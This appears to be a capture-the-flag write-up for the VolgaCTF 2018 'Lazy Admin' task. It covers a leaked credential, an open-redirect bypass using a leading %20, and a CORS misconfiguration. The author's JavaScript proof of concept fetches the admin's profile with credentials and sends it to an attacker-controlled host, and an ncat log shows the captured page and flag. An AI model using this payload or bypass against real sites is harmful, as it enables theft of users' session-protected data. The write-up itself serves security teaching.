Instantly share code, notes, and snippets.

Embed
What would you like to do?
VolgaCTF Quals 2018 - Lazy Admin Writeup
<!--
Lazy Admin
This lazy admin has not authorized my account yet! Get his email, I want to write to him.
https://quals.2018.volgactf.ru/tasks
http://lazy-admin.quals.2018.volgactf.ru/
http://lazy-admin.quals.2018.volgactf.ru/robots.txt
Disallow: /unauthorized_users.txt
http://lazy-admin.quals.2018.volgactf.ru/unauthorized_users.txt
Nick:BjnjjdGonhdkG@!lf
1. login and remove cookie
GET /profile.php HTTP/1.1
Host: lazy-admin.quals.2018.volgactf.ru
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://lazy-admin.quals.2018.volgactf.ru/verify.php
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=o0274jdbh8nsroa8p9oa775dv2 <--
Accept-Language: en-US,en;q=0.9,th;q=0.8
Connection: close
HTTP/1.1 302 Found
[..]
Location: /?redir=/profile.php
2. open redirect protection in place
GET /?redir=http://www.google.com HTTP/1.1
Host: lazy-admin.quals.2018.volgactf.ru
[..]
HTTP/1.1 200 OK
[..]
Redirect Error!
3. bypass open redirect with %20
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
GET /?redir=%20http://longcatnaja HTTP/1.1
Host: lazy-admin.quals.2018.volgactf.ru
[..]
HTTP/1.1 302 Found
Date: Sun, 25 Mar 2018 10:29:43 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.5.38-1~dotdeb+7.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://longcatnaja
[...]
4. exploit overly permissive cors
GET /verify.php HTTP/1.1
[..]
Origin: http://ggez.com
HTTP/1.1 200 OK
[..]
Access-Control-Allow-Origin: http://ggez.com
Access-Control-Allow-Credentials: true
POST /verify.php HTTP/1.1
Host: lazy-admin.quals.2018.volgactf.ru
Content-Length: 79
Cache-Control: max-age=0
Origin: http://lazy-admin.quals.2018.volgactf.ru
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://lazy-admin.quals.2018.volgactf.ru/verify.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,th;q=0.8
Cookie: PHPSESSID=o0274jdbh8nsroa8p9oa775dv2
Connection: close
link=%2F%3Fredir%3D%2520http%3A%2F%2Flongcatnaja%3A8000%2Fggez.html&submit=
payload is shown below:
-->
<!DOCTYPE html>
<html>
<head>
<meta name="author" content="Pichaya Morimoto">
<title>Overly Permissive CORS Exploit PoC - Strictly Confidential</title>
<script>
var xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET","http://lazy-admin.quals.2018.volgactf.ru/profile.php",false);
xmlhttp.withCredentials = "true";
xmlhttp.send();
var url = "http://longcatnaja:1234/getdata.php?html=" + escape(xmlhttp.responseText);
xmlhttp.open("GET", url, true);
xmlhttp.send();
</script>
</head>
<body>
<h1>LongCat</h1>
<pre id="content"></pre>
</body>
</body>
</html>
<!--
root@sectest:~# ncat -lvp 1234 -k
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 6268 F08D F34D 489A 8388 6936 16EF 6329 4C5F 93B7
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 82.202.212.170.
Ncat: Connection from 82.202.212.170:44467.
GET /getdata.php?html=%0D%0A%3C%21DOCTYPE%20html%3E%0D%0A%3Chtml%20lang%3D%22en%22%3E%0D%0A%20%20%3Chead%3E%0D%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0D%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3Dedge%22%3E%0D%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1%22%3E%0D%0A%20%20%20%20%3C%21--%20The%20above%203%20meta%20tags%20*must*%20come%20first%20in%20the%20head%3B%20any%20other%20head%20content%20must%20come%20*after*%20these%20tags%20--%3E%0D%0A%20%20%20%20%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0D%0A%20%20%20%20%3Cmeta%20name%3D%22author%22%20content%3D%22%22%3E%0D%0A%20%20%20%20%3Clink%20rel%3D%22icon%22%20href%3D%22/assets/favicon.ico%22%3E%0D%0A%0D%0A%20%20%20%20%3Ctitle%3EStrict%20blog%3C/title%3E%0D%0A%0D%0A%20%20%20%20%3C%21--%20Bootstrap%20core%20CSS%20--%3E%0D%0A%20%20%20%20%3Clink%20href%3D%22/assets/css/bootstrap.min.css%22%20rel%3D%22stylesheet%22%3E%0D%0A%0D%0A%20%20%20%20%3C%21--%20IE10%20viewport%20hack%20for%20Surface/desktop%20Windows%208%20bug%20--%3E%0D%0A%20%20%20%20%3Clink%20href%3D%22/assets/css/ie10-viewport-bug-workaround.css%22%20rel%3D%22stylesheet%22%3E%0D%0A%0D%0A%20%20%20%20%3C%21--%20Custom%20styles%20for%20this%20template%20--%3E%0D%0A%20%20%20%20%3Clink%20href%3D%22/assets/starter-template.css%22%20rel%3D%22stylesheet%22%3E%0D%0A%0D%0A%20%20%20%20%3C%21--%20Just%20for%20debugging%20purposes.%20Don%27t%20actually%20copy%20these%202%20lines%21%20--%3E%0D%0A%20%20%20%20%3C%21--%5Bif%20lt%20IE%209%5D%3E%3Cscript%20src%3D%22../../assets/js/ie8-responsive-file-warning.js%22%3E%3C/script%3E%3C%21%5Bendif%5D--%3E%0D%0A%20%20%20%20%3Cscript%20src%3D%22/assets/ie-emulation-modes-warning.js%22%3E%3C/script%3E%0D%0A%0D%0A%20%20%20%20%3C%21--%20HTML5%20shim%20and%20Respond.js%20for%20IE8%20support%20of%20HTML5%20elements%20and%20media%20queries%20--%3E%0D%0A%20%20%20%20%3C%21--%5Bif%20lt%20IE%209%5D%3E%0D%0A%20%20%20%20%20%20%3Cscript%20src%3D%22https%3A//oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js%22%3E%3C/script%3E%0D%0A%20%20%20%20%20%20%3Cscript%20src%3D%22https%3A//oss.maxcdn.com/respond/1.4.2/respond.min.js%22%3E%3C/script%3E%0D%0A%20%20%20%20%3C%21%5Bendif%5D--%3E%0D%0A%20%20%3C/head%3E%0D%0A%0D%0A%20%20%3Cbody%3E%0D%0A%0D%0A%20%20%20%20%3Cnav%20class%3D%22navbar%20navbar-inverse%20navbar-fixed-top%22%3E%0D%0A%20%20%20%20%20%20%3Cdiv%20class%3D%22container%22%3E%0D%0A%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22navbar-header%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%3Cbutton%20type%3D%22button%22%20class%3D%22navbar-toggle%20collapsed%22%20data-toggle%3D%22collapse%22%20data-target%3D%22%23navbar%22%20aria-expanded%3D%22false%22%20aria-controls%3D%22navbar%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22sr-only%22%3EToggle%20navigation%3C/span%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22icon-bar%22%3E%3C/span%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22icon-bar%22%3E%3C/span%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22icon-bar%22%3E%3C/span%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%3C/button%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%3Ca%20class%3D%22navbar-brand%22%20href%3D%22%23%22%3EStrict%20blog%3C/a%3E%0D%0A%20%20%20%20%20%20%20%20%3C/div%3E%0D%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22navbar%22%20class%3D%22collapse%20navbar-collapse%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%3Cul%20class%3D%22nav%20navbar-nav%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cli%3E%3Ca%20href%3D%22/profile.php%22%3EProfile%3C/a%3E%3C/li%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cli%3E%3Ca%20href%3D%22/verify.php%22%3EVerify%3C/a%3E%3C/li%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cli%3E%3Ca%20href%3D%22/logout.php%22%3ELogout%3C/a%3E%3C/li%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%3C/ul%3E%0D%0A%20%20%20%20%20%20%20%20%3C/div%3E%3C%21--/.nav-collapse%20--%3E%0D%0A%20%20%20%20%20%20%3C/div%3E%0D%0A%20%20%20%20%3C/nav%3E%0D%0A%0D%0A%20%20%20%20%3Cdiv%20class%3D%22container%22%3E%0D%0A%0D%0A%20%20%20%20%20%20%3Cdiv%20class%3D%22starter-template%22%3E%0D%0A%20%20%20%20%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22https%3A//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css%22%3E%0D%0A%3Cstyle%3E%0D%0A.card%20%7B%0D%0A%20%20box-shadow%3A%200%204px%208px%200%20rgba%280%2C%200%2C%200%2C%200.2%29%3B%0D%0A%20%20max-width%3A%20300px%3B%0D%0A%20%20margin%3A%20auto%3B%0D%0A%20%20text-align%3A%20center%3B%0D%0A%20%20font-family%3A%20arial%3B%0D%0A%7D%0D%0A%0D%0A.title%20%7B%0D%0A%20%20color%3A%20grey%3B%0D%0A%20%20font-size%3A%2018px%3B%0D%0A%7D%0D%0A%0D%0A.code%20%7B%0D%0A%20%20border%3A%20none%3B%0D%0A%20%20outline%3A%200%3B%0D%0A%20%20display%3A%20inline-block%3B%0D%0A%20%20padding%3A%208px%3B%0D%0A%20%20color%3A%20white%3B%0D%0A%20%20background-color%3A%20%23000%3B%0D%0A%20%20text-align%3A%20center%3B%0D%0A%20%20cursor%3A%20pointer%3B%0D%0A%20%20width%3A%20100%25%3B%0D%0A%20%20font-size%3A%2018px%3B%0D%0A%7D%0D%0A%0D%0Aa.icons%20%7B%0D%0A%20%20text-decoration%3A%20none%3B%0D%0A%20%20font-size%3A%2022px%3B%0D%0A%20%20color%3A%20black%3B%0D%0A%7D%0D%0A%0D%0A.code%3Ahover%2C%20a.icons%3Ahover%20%7B%0D%0A%20%20opacity%3A%200.7%3B%0D%0A%7D%0D%0A%3C/style%3E%0D%0A%3C/head%3E%0D%0A%3Cbody%3E%0D%0A%0D%0A%3Ch2%20style%3D%22text-align%3Acenter%22%3EUser%20Profile%20Card%3C/h2%3E%0D%0A%0D%0A%3Cdiv%20class%3D%22card%22%3E%0D%0A%20%20%3Ch1%3Eadmin%3C/h1%3E%0D%0A%20%20%3Cp%20class%3D%22title%22%3EVolgaCTF%7BclieNt_S1De_is_Awes0mEE_With_p@rse_Url%7D%3C/p%3E%0D%0A%20%20%3Cp%3ELazy%20admin%3C/p%3E%0D%0A%20%20%3Cdiv%20style%3D%22margin%3A%2024px%200%3B%22%3E%0D%0A%20%20%20%20%3Ca%20class%3D%22icons%22%20href%3D%22%23%22%3E%3Ci%20class%3D%22fa%20fa-dribbble%22%3E%3C/i%3E%3C/a%3E%20%0D%0A%20%20%20%20%3Ca%20class%3D%22icons%22%20href%3D%22%23%22%3E%3Ci%20class%3D%22fa%20fa-twitter%22%3E%3C/i%3E%3C/a%3E%20%20%0D%0A%20%20%20%20%3Ca%20class%3D%22icons%22%20href%3D%22%23%22%3E%3Ci%20class%3D%22fa%20fa-linkedin%22%3E%3C/i%3E%3C/a%3E%20%20%0D%0A%20%20%20%20%3Ca%20class%3D%22icons%22%20href%3D%22%23%22%3E%3Ci%20class%3D%22fa%20fa-facebook%22%3E%3C/i%3E%3C/a%3E%20%0D%0A%20%3C/div%3E%0D%0A%20%3Cp%3EYour%20verification%20code%3A%3C/p%3E%0D%0A%20%3Cp%3E%3Cdiv%20class%3D%22code%22%3EFhgNODNBSWKV%3C/div%3E%3C/p%3E%0D%0A%3C/div%3E%20%20%20%20%20%20%3C/div%3E%0D%0A%0D%0A%20%20%20%20%3C/div%3E%3C%21--%20/.container%20--%3E%0D%0A%0D%0A%0D%0A%20%20%20%20%3C%21--%20Bootstrap%20core%20JavaScript%0D%0A%20%20%20%20%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%20--%3E%0D%0A%20%20%20%20%3C%21--%20Placed%20at%20the%20end%20of%20the%20document%20so%20the%20pages%20load%20faster%20--%3E%0D%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js%22%3E%3C/script%3E%0D%0A%20%20%20%20%3Cscript%3Ewindow.jQuery%20%7C%7C%20document.write%28%27%3Cscript%20src%3D%22../../assets/js/vendor/jquery.min.js%22%3E%3C%5C/script%3E%27%29%3C/script%3E%0D%0A%20%20%20%20%3Cscript%20src%3D%22/assets/bootstrap.min.js%22%3E%3C/script%3E%0D%0A%20%20%20%20%3C%21--%20IE10%20viewport%20hack%20for%20Surface/desktop%20Windows%208%20bug%20--%3E%0D%0A%20%20%20%20%3Cscript%20src%3D%22/assets/ie10-viewport-bug-workaround.js%22%3E%3C/script%3E%0D%0A%20%20%3C/body%3E%0D%0A%3C/html%3E%0D%0A HTTP/1.1
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Referer: http://longcatnaja:8000/ggez.html
Origin: http://longcatnaja:8000
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en,*
Host: longcatnaja:1234
^C
root@sectest:~#
VolgaCTF{clieNt_S1De_is_Awes0mEE_With_p@rse_Url}
-->
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment